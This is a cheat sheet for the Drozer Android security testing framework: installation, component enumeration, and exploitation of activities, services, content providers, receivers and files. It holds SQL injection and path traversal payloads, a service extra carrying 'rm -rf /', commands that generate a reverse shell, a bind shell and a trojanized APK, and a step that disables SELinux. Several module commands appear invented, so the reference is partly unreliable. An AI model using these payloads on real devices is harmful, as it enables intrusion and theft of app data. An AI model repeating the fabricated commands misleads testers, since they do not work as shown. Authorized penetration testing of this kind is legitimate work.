Drozer Cheat Sheet
Overview
Drozer is a comprehensive security testing framework for Android applications. It lets you assume the role of an Android app and interact with the Dalvik VM, the IPC endpoints of other apps, and the underlying operating system. Drozer provides tools for remote exploitation of Android devices through malicious applications, as well as for comprehensive security assessment of Android applications.
Warning: Only use Drozer on devices and applications that you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws.
Installation
Prerequisites
```bash
# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk

# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip

# Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot

# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc
```
Linux Installation
```bash
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl

# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install
```
macOS Installation
```bash
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install Python 2.7
brew install python@2

# Install Drozer
pip2 install drozer

# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
```
Windows Installation
```bash
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/

# Install Drozer using pip
pip install drozer

# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/
```
Android Device Setup
```bash
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging

# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk

# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON

# Forward port for communication
adb forward tcp:31415 tcp:31415
```
Basic Usage
Connecting to a Device
```bash
# Connect to Drozer agent
drozer console connect

# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415

# List available devices
drozer console devices

# Connect to specific device
drozer console connect --device
```
Basic Commands
```bash
# List available modules
dz> list

# Get help for specific module
dz> help app.package.list

# List installed packages
dz> run app.package.list

# Get package information
dz> run app.package.info -a com.example.app

# List activities
dz> run app.activity.info -a com.example.app

# List services
dz> run app.service.info -a com.example.app

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
```
Package Analysis
Package Information
```bash
# List all packages
dz> run app.package.list

# List packages with filter
dz> run app.package.list -f keyword

# Get detailed package information
dz> run app.package.info -a com.example.app

# List package permissions
dz> run app.package.info -a com.example.app -p

# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET

# List system packages
dz> run app.package.list -f system

# List third-party packages
dz> run app.package.list -3
```
Application Components
```bash
# List activities
dz> run app.activity.info -a com.example.app

# List exported activities
dz> run app.activity.info -a com.example.app -e

# List services
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e
```
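The component listings above report what an app exposes to other apps on the device. As an added example (not part of the original cheat sheet or of the Drozer project), the script below reviews the same attack surface statically from a decoded AndroidManifest.xml and flags exported components that no permission guards. The sample manifest, its component names and the helper function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample: decoded (text) AndroidManifest.xml of a hypothetical app.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android">
  <application>
    <activity android:name=".MainActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity"/>
    <service android:name=".BackgroundService">
      <intent-filter><action android:name="com.example.SYNC"/></intent-filter>
    </service>
    <receiver android:name=".AdminReceiver" android:exported="true"
              android:permission="com.example.permission.ADMIN"/>
    <provider android:name=".UserProvider" android:exported="true"
              android:authorities="com.example.provider"
              android:readPermission="com.example.permission.READ"/>
  </application>
</manifest>"""


def is_exported(elem):
    """Effective exported state: explicit attribute first, then platform default."""
    explicit = elem.get(ANDROID + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return False  # platform default when targetSdkVersion >= 17
    # No explicit value: an intent filter implies exported (pre-Android 12 rule).
    return elem.find("intent-filter") is not None


def guard(elem, app):
    """Guarding permission (a provider needs read and write covered), or None."""
    perm = elem.get(ANDROID + "permission") or app.get(ANDROID + "permission")
    if perm is None and elem.tag == "provider":
        read = elem.get(ANDROID + "readPermission")
        write = elem.get(ANDROID + "writePermission")
        perm = "{}/{}".format(read, write) if read and write else None
    return perm


def audit_manifest(xml_text):
    """Return one finding per exported component, in manifest order."""
    findings = []
    for app in ET.fromstring(xml_text).iter("application"):
        for elem in app:
            if elem.tag in COMPONENT_TAGS and is_exported(elem):
                perm = guard(elem, app)
                findings.append({"type": elem.tag, "name": elem.get(ANDROID + "name"),
                                 "permission": perm, "unprotected": perm is None})
    return findings


if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        print("{type:9} {name:20} unprotected={unprotected}".format(**f))
```

In the sample, the provider is reported as unprotected because only reads are guarded; the service is exported implicitly through its intent filter.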
Activity Testing
Activity Enumeration
```bash
# Find activities in package
dz> run app.activity.info -a com.example.app

# Find exported activities
dz> run app.activity.info -a com.example.app -e

# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i

# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERA
```
Activity Exploitation
```bash
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity

# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret

# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data

# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com

# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true
```
Service Testing
Service Enumeration
```bash
# List services in package
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN
```
Service Exploitation
```bash
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService

# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"

# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"

# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundService
```
Content Provider Testing
Content Provider Enumeration
```bash
# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e

# Find URIs for content provider
dz> run app.provider.finduri com.example.provider

# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.app
```
Content Provider Exploitation
```bash
# Query content provider
dz> run app.provider.query content://com.example.provider/users

# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin

# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret

# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword

# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"

# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"

# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts

# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt
```
Broadcast Receiver Testing
Broadcast Receiver Enumeration
```bash
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED
```
Broadcast Receiver Exploitation
```bash
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION

# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"

# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED

# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high

# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true
```
File System Analysis
File System Enumeration
```bash
# List application files
dz> run tools.file.list /data/data/com.example.app/

# Find readable files
dz> run tools.file.readable /data/data/com.example.app/

# Find writable files
dz> run tools.file.writable /data/data/com.example.app/

# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/
```
File System Exploitation
```bash
# Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml

# Download file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db

# Upload file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so

# Create symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt

# Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
```
Database Analysis
SQLite Database Testing
```bash
# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Connect to SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db

# List tables in database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db

# Query database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"

# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"

# Dump database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db

# Export database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
```
Network Analysis
Network Configuration
```bash
# Check network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml

# List network interfaces
dz> run tools.setup.network

# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app

# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app
```
SSL/TLS Testing
```bash
# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app

# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app

# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
```
Advanced Usage
Custom Module Development
```python
# Create custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py
from drozer.modules import common, Module


class CustomExploit(Module, common.FileSystem, common.PackageManager):
    # Module metadata shown by "list" and "help" in the Drozer console
    name = "Custom Exploit Module"
    description = "Custom exploitation module"
    examples = "run custom.exploit -a com.example.app"
    author = "Security Researcher"
    date = "2024-01-01"
    license = "BSD (3 clause)"
    path = ["custom"]

    def add_arguments(self, parser):
        parser.add_argument("-a", "--package", help="target package")

    def execute(self, arguments):
        if arguments.package:
            self.stdout.write("Exploiting package: %s\n" % arguments.package)
            # Custom exploitation logic here
        else:
            self.stdout.write("Please specify target package\n")
```
Payload Generation
```bash
# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk

# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444

# Generate bind shell payload
dz> run payload.bind.shell --port 4444

# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
```
Privilege Escalation
```bash
# Check for root access
dz> run tools.setup.busybox

# Exploit setuid binaries
dz> run exploit.setuid.find

# Test for kernel exploits
dz> run exploit.kernel.check

# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app

# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app
```
Automation Scripts
Comprehensive Assessment Script
```python
#!/usr/bin/env python2
# str.format() is used instead of f-strings so the script runs under the
# Python 2 interpreter named in the shebang (and under Python 3 as well).
from __future__ import print_function

import json
import subprocess
import sys


class DrozerAutomation:
    def __init__(self, package_name):
        self.package = package_name
        self.results = {}

    def run_drozer_command(self, command):
        """Execute Drozer command and return output"""
        try:
            cmd = ["drozer", "console", "connect", "-c", command]
            output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
            return output.decode('utf-8')
        except subprocess.CalledProcessError as e:
            return u"Error: {}".format(e.output.decode('utf-8'))

    def analyze_package(self):
        """Perform comprehensive package analysis"""
        print("[+] Analyzing package: {}".format(self.package))

        # Package information
        self.results['package_info'] = self.run_drozer_command(
            "run app.package.info -a {}".format(self.package)
        )

        # Activities
        self.results['activities'] = self.run_drozer_command(
            "run app.activity.info -a {}".format(self.package)
        )

        # Services
        self.results['services'] = self.run_drozer_command(
            "run app.service.info -a {}".format(self.package)
        )

        # Content Providers
        self.results['providers'] = self.run_drozer_command(
            "run app.provider.info -a {}".format(self.package)
        )

        # Broadcast Receivers
        self.results['receivers'] = self.run_drozer_command(
            "run app.broadcast.info -a {}".format(self.package)
        )

        return self.results

    def test_exported_components(self):
        """Test exported components for vulnerabilities"""
        print("[+] Testing exported components")

        # Test exported activities
        exported_activities = self.run_drozer_command(
            "run app.activity.info -a {} -e".format(self.package)
        )

        # Test exported services
        exported_services = self.run_drozer_command(
            "run app.service.info -a {} -e".format(self.package)
        )

        # Test exported providers
        exported_providers = self.run_drozer_command(
            "run app.provider.info -a {} -e".format(self.package)
        )

        return {
            'exported_activities': exported_activities,
            'exported_services': exported_services,
            'exported_providers': exported_providers
        }

    def test_content_providers(self):
        """Test content providers for vulnerabilities"""
        print("[+] Testing content providers")

        # Find URIs
        uris = self.run_drozer_command(
            "run app.provider.finduri {}".format(self.package)
        )

        # Scan for accessible URIs
        accessible_uris = self.run_drozer_command(
            "run scanner.provider.finduris -a {}".format(self.package)
        )

        return {
            'uris': uris,
            'accessible_uris': accessible_uris
        }

    def generate_report(self):
        """Generate comprehensive security report"""
        report = {
            'package': self.package,
            'analysis_results': self.results,
            'exported_components': self.test_exported_components(),
            'content_provider_tests': self.test_content_providers()
        }

        report_path = "{}_security_report.json".format(self.package)
        with open(report_path, 'w') as f:
            json.dump(report, f, indent=2)

        print("[+] Report saved: {}".format(report_path))
        return report


# Usage
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python2 drozer_automation.py <package_name>")
        sys.exit(1)

    package_name = sys.argv[1]
    analyzer = DrozerAutomation(package_name)
    analyzer.analyze_package()
    analyzer.generate_report()
```
Batch Testing Script
```bash
#!/bin/bash
# Batch testing script for multiple packages

PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"

mkdir -p "$RESULTS_DIR"

while IFS= read -r package; do
    # Skip blank lines so no results are written to the top-level directory
    [ -z "$package" ] && continue

    echo "[+] Testing package: $package"

    # Create package-specific directory
    mkdir -p "$RESULTS_DIR/$package"

    # Run comprehensive tests
    drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
    drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
    drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
    drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
    drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"

    # Test content providers
    drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"

    # Test for common vulnerabilities
    drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
    drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"

    echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"

echo "[+] Batch testing completed"
```
Troubleshooting
Connection Issues
```bash
# Check if Drozer agent is running
adb shell am start -n com.mwr.dz/.activities.MainActivity

# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415

# Restart ADB server
adb kill-server
adb start-server

# Check device connectivity
adb devices

# Test connection manually
telnet localhost 31415
```
Agent Issues
```bash
# Reinstall Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk

# Check agent permissions
adb shell dumpsys package com.mwr.dz

# Enable agent in device settings
# Settings > Apps > Drozer Agent > Permissions

# Check if agent service is running
adb shell ps | grep drozer
```
Module Issues
```bash
# Refresh module list
dz> reload

# Check module path
dz> list

# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/

# Debug module loading
dz> help custom.module
```
Permission Issues
```bash
# Check required permissions
adb shell dumpsys package com.example.app | grep permission

# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE

# Check SELinux status
adb shell getenforce

# Disable SELinux (if rooted)
adb shell su -c "setenforce 0"
```
Performance Issues
```bash
# Increase timeout values
dz> set timeout 30

# Reduce output verbosity
dz> set verbose false

# Clear cache
rm -rf ~/.drozer/cache/

# Use specific device
drozer console connect --device
```
---
*This cheat sheet provides a comprehensive reference for using Drozer for Android application security testing. Always make sure you have proper authorization before testing any Android applications or devices.*